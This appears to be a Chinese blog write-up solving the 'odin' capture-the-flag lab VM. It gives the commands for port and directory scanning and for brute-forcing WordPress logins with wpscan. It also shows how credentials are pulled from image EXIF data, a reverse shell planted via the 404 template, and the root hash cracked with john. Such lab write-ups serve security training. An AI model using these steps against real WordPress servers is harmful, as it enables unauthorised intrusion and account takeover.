odin靶机(exiftooly隐写工具)

发布于:2022-11-05 ⋅ 阅读:(446) ⋅ 点赞:(0)

环境准备

靶机链接:百度网盘 请输入提取码

提取码:r5sr

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机开放端口和服务

nmap -p- -A -T4 192.168.166.139

2.用gobuster扫描目录

gobuster dir -u http://192.168.166.139 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 \ -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.访问网页

2.将图中加密信息解密,没有用!

3.用curl命令查看源码信息,发现域名!

curl -i -L http://192.168.166.139/wp-login.php

echo '192.168.166.139 odin' >> /etc/hosts

4.用wpscan工具进行对wordpress网站枚举用户

wpscan --url http://odin -e u

5.用了很久,破解不出密码!

wpscan --url http://odin -U odin -P /usr/share/wordlists/rockyou.txt

只能查看网页信息了,随便输入查看报错信息。

6.报错提示 您为用户名admin输入的密码不正确。密码丢失了?

说明有admin用户只是密码错误

7.用wpscan工具爆破出密码

8.第二种知道登录用户名和密码的方法

wget http://odin/wp-content/uploads/2020/12/bjorn.jpg //将首页的照片下载下来

用exiftool工具提权图片中的信息

echo 'YWRtaW46cXdlcnR5Cg==' | base64 -d

成功得到用户名密码

9.登录进去把404界面的代码替换成php-reverse-shell.php(github里有)的代码保存(也可以用index.php)

10.开启监听,触发木马,成功反弹shell

python3 -c "import pty;pty.spawn('/bin/bash')"

权限提升

1.查了一通,只有html目录下的配置文件有价值。

2.发现root加密的密码,解密下

3.写入hash.txt文本,用john工具破解!

echo '$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01' > hash.txt

john hash.txt

4.输入密码,成功提权,轻松拿下!!!

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到